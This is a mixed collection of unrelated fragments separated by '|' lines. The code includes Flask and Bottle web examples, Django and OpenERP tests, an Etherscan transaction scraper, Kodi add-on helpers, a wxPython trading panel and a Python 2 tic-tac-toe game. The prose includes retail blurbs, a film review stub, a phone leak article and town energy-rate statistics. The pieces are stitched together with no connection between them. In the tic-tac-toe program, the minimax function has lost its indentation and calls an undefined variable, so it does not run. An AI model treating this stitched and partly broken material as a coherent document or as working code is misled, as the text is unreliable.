def_reflist_map = {} # map of definitions to lists of elements it references
def main():
    """Parse each input OVAL file, index its ids, resolve the references
    of every definition, then write one check file per definition."""
    (options, args) = parse_options()
    for fname in args:
        tree = ET.parse(fname)
        # ET.dump(tree)
        gather_ids_for_elements(tree)
        gather_refs_for_defs(tree)
    output_checks(options.out_dname)
    sys.exit(0)
if __name__ == "__main__":
    main()
|
We here at MiMi Beauty Corp, the parent company of GE Productions and this site, are made up of everyone from business professionals to beauty supply pioneers to models to the directors of the largest hair companies in the world. One special officer is Jocelyn Davis, the Model Director of the Cuticle Remy XQ Hair Battle and Style Expo. She brings experience and the ability to personally test our hair, and to have a majority of professional celebrity stylists test it as well.
Our team is dedicated to making every shopping experience the best and most amazing that you have ever had. We always guarantee 100% satisfaction in every aspect of your shopping experience. Not only is every bundle of hair guaranteed for at least 3 months, each individual here from the Executive President to the Customer Support Staff will be more than happy to personally guide you through your shopping experience. In fact, you will find at many times the President will be on the computers or phones to personally help and explain every detail that you wish to have explained!
We here at MiMi Beauty Corp will go to any length to make sure that YOU are happy with your purchase and are confident that you will be wearing our hair for years to come!
|
from cim_client import CIMClient
from snmp_client import SNMPClient
from flask import Flask, redirect, render_template, url_for
# Create the Flask application instance used by all routes below.
app = Flask(__name__)
# Frontpage: send visitors straight to the CIM dashboard
@app.route("/")
def index():
    """Redirect the site root to the CIM dashboard."""
    dashboard_url = url_for('cim_dashboard')
    return redirect(dashboard_url)
# CIM dashboard method
@app.route("/cim")
def cim_dashboard():
    """Render the CIM dashboard with OS info and IP interfaces.

    Each probe is wrapped individually so a failure in one still lets the
    page render with a fallback value.
    """
    client = CIMClient()
    try:
        os_info = client.get_os_info()
    except Exception:  # was a bare except; don't swallow SystemExit/KeyboardInterrupt
        os_info = 'not available'
    try:
        ip_interfaces = client.get_ip_interfaces()
    except Exception:
        ip_interfaces = []
    return render_template('cim.html',
                           os_info=os_info, ip_interfaces=ip_interfaces)
# SNMP dashboard method
@app.route("/snmp")
def snmp_dashboard():
    """Render the SNMP dashboard with OS info and IP interfaces.

    Mirrors cim_dashboard(): each probe is wrapped separately so one
    failure still renders the page with a fallback value.
    """
    snmp = SNMPClient()
    try:
        os_info = snmp.getOs()
    except Exception:  # was a bare except; don't swallow SystemExit/KeyboardInterrupt
        os_info = "Host not available"
    try:
        ip_interfaces = snmp.getNetwork()
    except Exception:
        ip_interfaces = []
    return render_template('snmp.html',
                           os_info=os_info, ip_interfaces=ip_interfaces)
# Run the server
# (Flask's built-in development server; not suitable for production use.)
if __name__ == "__main__":
    app.run()
|
Until the abysmal Vanishing on 7th Street I thought Brad Anderson could do no wrong. Session 9 holds up, The Machinist is still a twisted indie classic and Transsiberian is a Hitchcockian thrill-ride. Enter Anderson's new thriller from WWE Studios and Tri-Star Pictures, The Call, starring Halle Berry and Abigail Breslin. Will it be enough to bring the director back into our good graces?
The film was written by Richard D'Ovidio.
|
'''
Project - Tic Tic Tac Toe
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import sys#
import time#for wait of 1 seconds
import os
import random#for adding randomness into program so that the computer's move is not always the same
#display function start
def disp():
    """Print the 3x3 board: '_' for empty (-100), 'O' for 0, 'X' for 1."""
    for x in range(3):
        for y in range(3):
            if a[x][y] == -100:
                print "_ ",
            elif a[x][y] == 0 :
                print "O ",
            else :
                print "X ",
        print "\n"
#display function end
#check function
def check():
    """Return the game result read from the global board ``a``.

    -100 : user (X, cell value 1) has three in a line
     100 : computer (O, cell value 0) has three in a line
       0 : board full, draw
    None : moves still remain
    """
    # Gather all eight winning lines: rows, then columns, then diagonals.
    lines = [list(a[r]) for r in range(3)]
    lines += [[a[r][c] for r in range(3)] for c in range(3)]
    lines.append([a[i][i] for i in range(3)])
    lines.append([a[i][2 - i] for i in range(3)])
    for line in lines:
        # Sum uniquely identifies the winners: 1+1+1 == 3, 0+0+0 == 0
        # (any empty cell pushes the sum far negative).
        total = sum(line)
        if total == 3:
            return -100
        if total == 0:
            return 100
    # Any remaining empty square means the game is still in progress.
    for row in a:
        if -100 in row:
            return None
    return 0
#check function end
#input
def user_move():
    """Read the user's move (row then column, each 0-2) from stdin and
    place an X (1) on the global board.

    Re-prompts recursively on out-of-range or occupied cells.
    NOTE(review): Python-2 input() evaluates the typed text; raw_input()
    would be safer -- left unchanged here.
    """
    x = int(input())
    y = int(input())
    if x>2 or x < 0 or y>2 or y<0 or a[x][y] != -100 :
        print "illegal move"
        user_move()
    else :
        a[x][y] = 1
#input close
#minmax start
def minmax(game,depth,move_whose):
if check() == 100:
return 100 - depth,0
if check() == -100:
return depth - 100,0
if check() == 0:
return 0,0
maximum =-10000
minimum = 10000
trick=0
trickmaxmove=0
tricksumminmove=0
trickmat = [[-10000 for x in range(3)] for x in range(3)]
for x in range(3):
for y in range(3):
if game[x][y] == -100:
if move_whose:
game[x][y] = 1
else:
game[x][y] = 0
temp,trick = minmax(game,depth+1,not(move_whose))
trickmat[x][y]=trick
if (temp==100-depth-1) and not(move_whose):#dont evaluate further if move is of computer and there is an instant win,
#THIS ALSO REDUCES THE TRICK CASES WHERE WE INSTEAD OF CLAIMING INSTANT WIN , TRY TO MAKE A TRICK
game[x][y]=-100
return temp,trick
#code can be optimized by moving these conditions into the if below
if (temp==100-depth-2)and (move_whose):
trick+=1
disp()
print "\n\n"
time.sleep(1)
if move_whose:
tricksumminmove+=trick
if minimum > temp:
minimum = temp
else:
if maximum < temp:
maximum = temp
trickmaxmove=trick
game[x][y] = -100
if depth==0:
print trickmat
if move_whose:
return minimum,tricksumminmove
else:
if tricksumminmove!=0:
print trickforminmove
return maximum,trickmaxmove
#next move
def ttt_move():
    """Choose and play the computer's (O) move on the global board ``a``.

    Scores every empty square with minmax(), adds that square's trick
    count as a bonus, and plays the highest-scoring square (defaulting to
    the centre when all scores tie at the sentinel).
    """
    score = [[-10000 for x in range(3)] for x in range(3)]
    trick = [[-10000 for x in range(3)] for x in range(3)]
    for x in range(3):
        for y in range(3):
            if a[x][y] == -100:
                # Tentatively place O, evaluate, then undo.
                a[x][y] = 0
                score[x][y],trick[x][y] = minmax(a,0,True)#round(random.random(),2)
                score[x][y]=score[x][y]+trick[x][y]#trick count acts as a tie-breaking bonus on the minimax score
                #depth = 0 for 1st time and 3rd parameter is whose move it is False == computer and True == user
                a[x][y] = -100
    maximum = -10000
    bestx = 1
    besty = 1
    for x in range(3):
        for y in range(3):
            if score[x][y] > maximum:
                maximum = score[x][y]
                bestx = x
                besty = y
    a[bestx][besty] = 0
    print score    # debug: per-square scores
    print trick    # debug: per-square trick counts
#next move end
#initial choice
def initial_choice():
    """Ask whether the user wants the first move.

    'n' lets the computer open immediately; 'y' returns so the user moves
    first; any other answer re-prompts recursively.
    """
    ans = raw_input("wanna play first?")
    if ans == "n":
        ttt_move()
        disp()
    elif ans == "y":
        return
    elif ans !="y":
        print "type y or n"
        initial_choice()
#initial_choice end
#int main
'''a trick is defined as a position where for every move of the opponent the pc wins ,
if there is no sure short win already
and if opponent plays a little non perfect by choosing the second least tree'''
# Board: 3x3 grid; -100 = empty, 1 = user (X), 0 = computer (O).
a = [[-100 for x in range(3)] for x in range(3)]
initial_choice()
# Main game loop: user moves, then the computer, checking for a result
# after every half-move. sys.exit() with a message ends the game.
while True :
    user_move()
    disp()
    if check() == -100:
        sys.exit("YOU WON!!!")
    elif check() == 0:
        sys.exit("IS THIS THE BEST YOU CAN DO???!!!")
    print "thinking........"
    time.sleep(1)
    os.system('clear')
    ttt_move()
    disp()
    if check() == 100:
        sys.exit("YOU LOSE")
    elif check() == 0:
        sys.exit("IS THIS THE BEST YOU CAN DO???!!!")
#int main end
|
Fixed — a solid platform to steady your rifleSpring loaded adjustable legs: 13-23" / 33-58.5cmGuaran..
Lever Tilt — features a lever to rapidly level your rifleSpring loaded adjustable legs: 13-23" / 33-..
Fixed — a solid platform to steady your rifleSpring loaded adjustable legs: 13-27" / 33-68.5cmGuaran..
Lever Tilt — features a lever to rapidly level your rifle Spring loaded adjustable legs: 13-27" / 3..
Fixed — a solid platform to steady your rifle Spring loaded adjustable legs: 6-9" / 15-23cm Guaran..
Lever Tilt — features a lever to rapidly level your rifleSpring loaded adjustable legs: 6-9" / 15-23..
Quick removal barrel clamp Spring loaded legs — twist to lock Rubber anti-slip feet Fits barrels ..
Fits barrels, Picatinny/weaver rails, swivel studsOne handed operationQuick release notched legs — S..
Fixed — a solid platform to steady your rifleSpring loaded adjustable legs: 9-13" / 23-33cmGuarantee..
Lever Tilt — features a lever to rapidly level your rifleSpring loaded adjustable legs: 9-13" / 23-3..
3way pivoting headSingle-handed leg extension Single-handed leg deployment..
|
def test_create_tax_include(oerp):
    """Create an ISS 2% tax code plus its tax record and verify both exist."""
    tax_code_values = {
        'name': 'ISS 2%',
        'company_id': 1,
        'sign': 1,
        'tax_discount': 'TRUE',
        'tax_include': 'TRUE',
        'notprintable': 'TRUE',
        'domain': 'iss'
    }
    tax_code_obj = oerp.pool.get('account.tax.code')
    tax_code_id = tax_code_obj.create(oerp.cr, 1, tax_code_values)
    created_code = tax_code_obj.browse(oerp.cr, 1, [tax_code_id])[0]
    assert created_code.id == tax_code_id
    tax_values = {
        'sequence': '1',
        'type_tax_use': 'all',
        'applicable_type': 'true',
        'company_id': 1,
        'name': 'ISS 2%',
        'amount': 0.0200,
        'type': 'percent',
        'tax_code_id': tax_code_id,
        'base_reduction': 0.0000,
        'amount_mva': 0.0000,
        'price_include': 'FALSE',
        'tax_discount': 'TRUE',
        'tax_add': 'FALSE',
        'tax_include': 'TRUE',
        'tax_retain': 'FALSE',
        'domain': 'iss',
    }
    tax_obj = oerp.pool.get('account.tax')
    tax_id = tax_obj.create(oerp.cr, 1, tax_values)
    created_tax = tax_obj.browse(oerp.cr, 1, [tax_id])[0]
    assert created_tax.id == tax_id
|
Winter is characterised by short cold days and long dark nights. Growing has stopped and the harvest is over. Animals bulked up by Autumn’s feast retreat, hibernate and live off what has been stored. A quietness and stillness descend upon the land. Seeds beneath the ground wait quietly for Spring’s call to grow again.
Winter is the most Yin time of year. Yin is dark, wet, slow and quiet. It recedes and receives. It is a time of rest which allows for repair and replenishment. It is a necessary balance to Summer’s extreme Yang activity of growing and expanding, its brightness, heat, and frenetic activity. Yang spends and Yin restores. Each needs the other to do its job.
I wish you all a wonderful season of celebrating. May 2019 bring health and abundance, joy and peace.
|
# django-openid-auth - OpenID integration for django.contrib.auth
#
# Copyright (C) 2013 Canonical Ltd.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.test import TestCase
from django_openid_auth.models import (
Permission,
UserOpenID,
)
class UserOpenIDModelTestCase(TestCase):
    """Tests for the UserOpenID model and its verification permission."""

    def _create_user_and_openid(self):
        """Create a test user plus an associated UserOpenID record."""
        account = User.objects.create_user('someuser', 'someuser@example.com',
                                           password=None)
        openid, _ = UserOpenID.objects.get_or_create(
            user=account,
            claimed_id='http://example.com/existing_identity',
            display_id='http://example.com/existing_identity')
        return account, openid

    def _assert_not_verified(self):
        """Assert the test user lacks the account_verified permission."""
        self.assertFalse(
            User.objects.get(username='someuser').has_perm(
                'django_openid_auth.account_verified'))

    def test_create_useropenid(self):
        """A freshly linked OpenID keeps its ids and grants no permission."""
        account, openid = self._create_user_and_openid()
        self.assertEqual('someuser', openid.user.username)
        self.assertEqual(
            openid.claimed_id, 'http://example.com/existing_identity')
        self.assertEqual(
            openid.display_id, 'http://example.com/existing_identity')
        self._assert_not_verified()

    def test_delete_verified_useropenid(self):
        """Deleting a verified OpenID revokes account_verified."""
        account, openid = self._create_user_and_openid()
        permission = Permission.objects.get(codename='account_verified')
        account.user_permissions.add(permission)
        self.assertTrue(
            User.objects.get(username='someuser').has_perm(
                'django_openid_auth.account_verified'))
        openid.delete()
        self._assert_not_verified()
|
Stocks & Commodities V. 23:5 (75-81): Traders’ Tips by Technical Analysis, Inc.
Home > Articles > Volume 23 (2005) > Chapter 5 (May 2005) > Stocks & Commodities V. 23:5 (75-81): Traders’ Tips by Technical Analysis, Inc.
Stuart Belknap's article "Cycles In Time And Money" describes an algorithm for plotting a centered cycle oscillator. Traders' Tips supplies code for his indicator, the universal cycle index (UCI), which is intended to be "in phase" with the market and to operate in real time.
Code is given for the following programs: TradeStation, Wealth-Lab, AmiBroker, eSignal, NeuroShell Trader, NeoTicker, AIQ, and Aspen Graphics. MetaStock code for the UCI was provided in his article.
|
#-*-coding:utf-8 -*-
# 将ETHSCAN记录保存的脚本
import urllib.request as urllib2
from urllib import request
import random
from bs4 import BeautifulSoup
'''
# user_agent是爬虫与反爬虫斗争的第一步
ua_headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
}'''
# Pool of browser User-Agent strings; one is picked at random per run to
# make the scraper look like an ordinary browser.
ua_list = [
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv2.0.1) Gecko/20100101 Firefox/4.0.1",
    "Mozilla/5.0 (Windows NT 6.1; rv2.0.1) Gecko/20100101 Firefox/4.0.1",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
    "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
]
user_agent=random.choice(ua_list)
# The Ethereum address whose transaction list is scraped.
address="0xBD9d6e7489A7b450937fA7ECbAbd71Be819beE3D"
page_number_start=0
page_count=10
for ii in range(page_count):
    page_number_start=page_number_start+1
    page_number=str(page_number_start)
    url="https://etherscan.io/txs?a="+address+"&p="+page_number
    # Build the request and attach the spoofed User-Agent header.
    request1=urllib2.Request(url=url)
    request1.add_header('User-Agent',user_agent)
    # Fetch the page; the response file object feeds BeautifulSoup directly.
    response=urllib2.urlopen(request1)
    soup=BeautifulSoup(response,"html.parser")
    k=0
    # Open the CSV once per page instead of once per table cell.
    with open('test11.csv', 'a') as f:
        for i in soup.find_all('td',limit=400):
            k=k+1
            # Every 8th cell ends a table row -> emit a newline.
            if k%8==0:
                br='\n'
            else:
                br=''
            tbody=i.get_text()
            # BUGFIX: the original wrote str(bytes), which produces the
            # literal "b'...'" in the CSV. Encode with 'ignore' to drop
            # characters GBK cannot represent, then decode back to text.
            data=tbody.encode('gbk','ignore').decode('gbk')+","+br
            f.write(data)
    print("已完成:",str(page_number)+"/"+str(page_count))
|
We have had several Galaxy S5 mini leaks, we’ve come to know its specs through various sources and we even came across a picture of it. Today, we have alleged pictures of the device along with new specifications.
The supposed Galaxy S5 mini in the leaked pictures looks a lot like the Galaxy S5 with few minor differences. There’s the same back with the dotted pattern design, the heart rate monitor below the camera, the same rubber padding is present underneath the back panel as well. The picture also shows the fingerprint scanner in action.
The difference lies in the fact that the dotted pattern stretches to the sides more than what we’ve seen on the Galaxy S5. The smaller battery also confirms that this is indeed the S5 mini. The top does not feature a cover on the microUSB port, which suggests the device won’t be water and dust resistant.
The source also reveals the specifications, which are different from what we’ve heard till now. According to the source, the Galaxy S5 mini will be powered by a new Exynos 3 Quad (Exynos 3470) chipset with a quad-core 1.4 GHz processor with Mali-400 MP4 GPU and not the Snapdragon 400. The device will also come with 1.5 GB RAM. Rest of the specs are the same we’ve known all this while, a 4.5-inch 720p display, 8 MP rear camera, 2.1 MP front facing camera, 16 GB internal storage with microSD expansion.
We can expect the Galaxy S5 mini to go official soon, as the other Galaxy S5 variants have already been unveiled. The K Zoom aka the S5 Zoom was unveiled last month while the Galaxy S5 Active was launched yesterday. The Galaxy S5 mini seems like a great mid-range device but ultimately, everything depends on the price it is launched at.
|
"""A simple number and datetime addition JSON API.
Run the app:
$ python examples/bottle_example.py
Try the following with httpie (a cURL-like utility, http://httpie.org):
$ pip install httpie
$ http GET :5001/
$ http GET :5001/ name==Ada
$ http POST :5001/add x=40 y=2
$ http POST :5001/dateadd value=1973-04-10 addend=63
$ http POST :5001/dateadd value=2014-10-23 addend=525600 unit=minutes
"""
import datetime as dt
from bottle import route, run, error, response
from webargs import fields, validate
from webargs.bottleparser import use_args, use_kwargs
hello_args = {
    'name': fields.Str(missing='Friend')
}


@route('/', method='GET')
@use_args(hello_args)
def index(args):
    """A welcome page greeting the optional ``name`` query argument."""
    greeting = 'Welcome, {}!'.format(args['name'])
    return {'message': greeting}
add_args = {
    'x': fields.Float(required=True),
    'y': fields.Float(required=True),
}


@route('/add', method='POST')
@use_kwargs(add_args)
def add(x, y):
    """An addition endpoint returning the sum of x and y."""
    total = x + y
    return {'result': total}
dateadd_args = {
    'value': fields.DateTime(required=False),
    'addend': fields.Int(required=True, validate=validate.Range(min=1)),
    'unit': fields.Str(missing='days', validate=validate.OneOf(['minutes', 'days']))
}


@route('/dateadd', method='POST')
@use_kwargs(dateadd_args)
def dateadd(value, addend, unit):
    """A datetime adder endpoint (defaults to "now" when value is omitted)."""
    base = value or dt.datetime.utcnow()
    shift = dt.timedelta(minutes=addend) if unit == 'minutes' else dt.timedelta(days=addend)
    return {'result': (base + shift).isoformat()}
# Return validation errors as JSON
@error(422)
def error422(http_error):
    """Serve 422 validation failures with a JSON body."""
    response.content_type = 'application/json'
    return http_error.body
# Start bottle's development server with auto-reload and debug enabled.
if __name__ == '__main__':
    run(port=5001, reloader=True, debug=True)
|
In the most recent month of electricity data, February 2019, Grand Coteau's average rate was 9.15¢/kWh -- a difference of about -28% from the U.S. average of 12.70¢/kWh that month.
Year over year in Grand Coteau (LA), electricity rates increased an estimated 2 percent -- from 8.94¢/kWh (February 2018) to 9.15¢/kWh (February 2019).
In February 2018, the average electricity rate in Grand Coteau (Louisiana) of 8.94¢/kWh -- a difference of about -29% from the United States average of 12.66¢/kWh that month.
The average amount of solar radition in Grand Coteau (measured on a monthly basis) is 25 percent lower than an area of the U.S. (Nevada) with historically high levels of solar radiation.
October is historically the month that will have the highest solar output (AC) values in Grand Coteau -- averaging an estimated 576 kWhac. February typically has the lowest output (405 kWhac).
The average amount of solar radition in Grand Coteau (measured monthly) is 32 percent higher than an area of the U.S. (Washington) with historically low levels of solar radiation.
The average monthly solar radiation level in Grand Coteau, LA is 4.94 kilowatt hours per square meter per day(kWh/m2/day). See the chart below for monthly comparisons.
The average monthly solar system output (AC) in Grand Coteau, LA is 5740 kilowatt hours (AC). See the visualization below for month-by-month averages in Grand Coteau.
In the most recent month of natural gas data, January 2019, Grand Coteau's average rate of 10.18$/Mcf -- a difference of about +8% from the U.S. average of 9.43$/Mcf that month.
On a year-over-year basis in Grand Coteau (LA), natural gas rates increased about 17 percent -- from 8.72$/Mcf (January 2018) to 10.18$/Mcf (January 2019).
In January 2018, the average natural gas rate in Grand Coteau (Louisiana) was 8.72$/Mcf -- a difference of about -2% from the United States average of 8.91$/Mcf that month.
Average natural gas rates in Grand Coteau, LA in January 2019 were 10.18$/Mcf -- an estimated 8 percent more than that month's average U.S. rate of 9.43$/Mcf.
Comparison of Grand Coteau natural gas rates versus national average rates.
Electric companies providing service in or near Grand Coteau, LA.
Our search for electric companies located in Grand Coteau produced no matches.
Gas companies that offer service in or near Grand Coteau, LA.
Our search for gas companies located in Grand Coteau produced no matches.
Builders that specialize in solar energy in or near Grand Coteau, LA.
Our search for solar contractors located in or near Grand Coteau produced no matches.
Grand Coteau (LA) is a town in St. Landry County with an estimated population of 947.
For more information on energy in Grand Coteau, LA, or for additional resources regarding Grand Coteau energy, visit the EIA.
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin
from .app_common import log, defaultbanner, addon_handle, addon_url, translate, showNotification, kodiVersion, installAddon
from .utils import cleanText, encodeUrl
def get_InputStreamHelper(drm):
    """Return an inputstreamhelper.Helper for MPD playback, or None.

    Installs script.module.inputstreamhelper when missing, falls back from
    PlayReady to DRM-free playback when that scheme is unsupported, and
    triggers installation of the inputstream add-on itself if absent.
    """
    streamHelper = None
    if kodiVersion >= 17:
        try:
            import inputstreamhelper
        except ImportError:  # was a bare except; only a missing module should trigger install
            installAddon('script.module.inputstreamhelper')
            return streamHelper
    try:
        streamHelper = inputstreamhelper.Helper('mpd', drm=drm)
    except Exception as ex:
        # BUGFIX: the original compared the exception *object* to the string
        # 'UnsupportedDRMScheme' (always False), so the PlayReady fallback
        # never ran. Match on the exception text/name instead.
        # NOTE(review): confirm the exact exception inputstreamhelper raises.
        if 'UnsupportedDRMScheme' in (type(ex).__name__ + str(ex)) and drm == 'com.microsoft.playready':
            streamHelper = inputstreamhelper.Helper('mpd', drm=None)
        else:
            showNotification(translate(30018).format(drm), notificationType='ERROR')
    if streamHelper and not streamHelper._has_inputstream():
        # install inputstream
        xbmc.executebuiltin(
            'InstallAddon(' + streamHelper.inputstream_addon + ')', True)
    return streamHelper
def addElement(title, fanart, icon, description, link, mode, channel='', duration=None, date='', isFolder=True,
               subtitles=None, width=768, height=432, showID=None):
    """Create a Kodi ListItem and append it to the plugin directory.

    Folders become browsable entries; non-folders are marked playable and
    annotated with h264/aac stream hints so Kodi can show duration and
    resolution without probing. ``link``/``mode``/``showID`` are encoded
    into the plugin callback URL.
    """
    # Substitute the add-on's default artwork / placeholder description.
    if fanart == '':
        fanart = defaultbanner
    if icon == '':
        icon = defaultbanner
    if description == '':
        description = (translate(30004))
    description = cleanText(description)
    title = cleanText(title)
    list_item = xbmcgui.ListItem(title)
    list_item.setInfo('video', {'title': title,
                                'Tvshowtitle': title,
                                'Sorttitle': title,
                                'Plot': description,
                                'Plotoutline': description,
                                'Aired': date,
                                'Studio': channel})
    list_item.setArt({'thumb': icon, 'icon': icon, 'fanart': fanart})
    list_item.setProperty('IsPlayable', str(not isFolder))
    if not duration:
        duration = 0
    if not isFolder:
        list_item.setInfo(type='Video', infoLabels={'mediatype': 'video'})
        list_item.addStreamInfo('video', {'codec': 'h264', 'duration': int(
            duration), 'aspect': 1.78, 'width': width, 'height': height})
        list_item.addStreamInfo(
            'audio', {'codec': 'aac', 'language': 'de', 'channels': 2})
        # idiom fix: identity comparison with None ('is not' instead of '!=')
        if subtitles is not None:
            list_item.addStreamInfo('subtitle', {'language': 'de'})
    parameters = {'link': link, 'mode': mode, 'showID': showID}
    url = addon_url + '?' + encodeUrl(parameters)
    xbmcplugin.addDirectoryItem(addon_handle, url, list_item, isFolder)
    del list_item
def addItemsToKodi(sort):
    """Finish the directory listing built by addElement() calls.

    Sets category/content hints, optionally enables title sorting, and
    signals Kodi that the listing is complete.
    """
    xbmcplugin.setPluginCategory(addon_handle, 'Show')
    xbmcplugin.setContent(addon_handle, 'videos')
    if sort:
        xbmcplugin.addSortMethod(addon_handle, xbmcplugin.SORT_METHOD_VIDEO_TITLE)
    xbmcplugin.endOfDirectory(addon_handle)
    log('callback done')
def play_video(url):
    """Resolve a previously announced playable item to its final URL so
    Kodi starts playback."""
    play_item = xbmcgui.ListItem(path=url)
    xbmcplugin.setResolvedUrl(addon_handle, True, listitem=play_item)
    del play_item
    log('callback done')
def play_liveStream(path, addon, drm, tkn):
    """Resolve a live stream through inputstream.adaptive with DRM licensing."""
    stream_item = xbmcgui.ListItem(path=path)
    # Configure the adaptive inputstream: MPD manifest, full manifest
    # refreshes for live content, and the DRM licence endpoint/token.
    adaptive_props = [
        ('inputstreamaddon', addon),
        ('inputstream.adaptive.manifest_type', 'mpd'),
        ('inputstream.adaptive.license_type', drm),
        ('inputstream.adaptive.manifest_update_parameter', 'full'),
        ('inputstream.adaptive.license_key', tkn),
    ]
    for prop_name, prop_value in adaptive_props:
        stream_item.setProperty(prop_name, prop_value)
    xbmcplugin.setResolvedUrl(addon_handle, True, listitem=stream_item)
    del stream_item
    log('callback done')
|
It All Started with a माउस. How awesome is this wallpaper?!. HD Wallpaper and background images in the डिज़्नी club tagged: disney pixar mickey mouse disney princess disney animals disney villains classic disney disney renaissance.
|
import wx
from algoloader import AlgorithmLoader
from wx.lib.pubsub import Publisher as pub
from publisherconstants import *
# Event IDs for the two refresh buttons (wx.NewId() guarantees uniqueness).
ID_LOAD_ALGOS = wx.NewId()
ID_LOAD_MARKETS = wx.NewId()
class AlgoManagementPanel(wx.Panel):
    """Panel listing available trading algorithms and tradable markets.

    Shows a list box of algorithms (loaded via AlgorithmLoader) and a tree
    of markets obtained from the supplied session; each has a refresh
    button. Status messages are published to the status bar via pubsub.
    """
    def __init__(self, parent, session):
        super(AlgoManagementPanel, self).__init__(parent)
        # session supplies sessionType, GetAvailableMarkets() and GetMarketData()
        self.session = session
        self.InitUI()
        # Load available trading algorithms and markets up front
        self.LoadAlgos()
        self.LoadMarkets()
    def InitUI(self):
        """Build the static layout: two labelled sections with refresh
        buttons, the algorithm list box and the market tree."""
        font = wx.SystemSettings_GetFont(wx.SYS_SYSTEM_FONT)
        font.SetPointSize(9)
        # Refresh image for adding to refresh buttons
        bitmapRefresh = wx.Bitmap('img/refresh.png')
        image = wx.ImageFromBitmap(bitmapRefresh)
        image = image.Scale(16, 16, wx.IMAGE_QUALITY_HIGH)
        bitmapRefresh = wx.BitmapFromImage(image)
        vbox1 = wx.BoxSizer(wx.VERTICAL)
        hbox1 = wx.BoxSizer(wx.HORIZONTAL)
        st1 = wx.StaticText(self, label='Available Algorithms')
        st1.SetFont(font)
        hbox1.Add(st1)
        btnRefreshAlgos = wx.BitmapButton(self, ID_LOAD_ALGOS, bitmapRefresh)
        hbox1.Add(btnRefreshAlgos, flag=wx.RIGHT | wx.TOP)
        vbox1.Add(hbox1, flag=wx.LEFT | wx.TOP, border=10)
        vbox1.Add((-1, 10))
        hbox2 = wx.BoxSizer(wx.HORIZONTAL)
        self.lstAlgos = wx.ListBox(self, -1)
        hbox2.Add(self.lstAlgos, proportion=1, flag=wx.EXPAND)
        vbox1.Add(hbox2, proportion=1, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=10)
        vbox1.Add((-1, 10))
        hbox3 = wx.BoxSizer(wx.HORIZONTAL)
        st2 = wx.StaticText(self, label='Available ' + self.session.sessionType + ' Markets')
        st2.SetFont(font)
        hbox3.Add(st2)
        btnRefreshMarkets = wx.BitmapButton(self, ID_LOAD_MARKETS, bitmapRefresh)
        hbox3.Add(btnRefreshMarkets, flag=wx.RIGHT | wx.TOP)
        vbox1.Add(hbox3, flag=wx.LEFT, border=10)
        vbox1.Add((-1, 10))
        hbox4 = wx.BoxSizer(wx.HORIZONTAL)
        self.treeMarkets = wx.TreeCtrl(self, 1, wx.DefaultPosition, (-1, -1), wx.TR_HAS_BUTTONS | wx.TR_MULTIPLE)
        hbox4.Add(self.treeMarkets, proportion=1, flag=wx.EXPAND)
        vbox1.Add(hbox4, proportion=1, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=10)
        self.SetSizer(vbox1)
        # Event handlers
        self.Bind(wx.EVT_BUTTON, self.OnLoadAlgos, id=ID_LOAD_ALGOS)
        self.Bind(wx.EVT_BUTTON, self.OnLoadMarkets, id=ID_LOAD_MARKETS)
        self.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnMarketSelected, self.treeMarkets)
    def OnLoadAlgos(self, event):
        # Refresh-button handler: reload the algorithm list.
        self.LoadAlgos()
    def OnLoadMarkets(self, event):
        # Refresh-button handler: reload the market tree.
        self.LoadMarkets()
    def LoadAlgos(self):
        """Populate the list box with "name - description" entries."""
        pub.sendMessage(SUBJECT_STATUSBAR, "Loading trading algorithms...")
        self.algos = AlgorithmLoader().loadAlgorithms()
        self.lstAlgos.Clear()
        for algo in self.algos:
            self.lstAlgos.Append(algo.name + " - " + algo.description)
        pub.sendMessage(SUBJECT_STATUSBAR, "Found " + str(len(self.algos)) + " available algorithms")
        return True
    def LoadMarkets(self):
        """Rebuild the market tree from the session's available markets.

        Returns False when the session reports no markets, True otherwise.
        """
        self.markets = self.session.GetAvailableMarkets()
        if self.markets == None:
            return False
        self.treeMarkets.DeleteAllItems()
        root = self.treeMarkets.AddRoot('Markets')
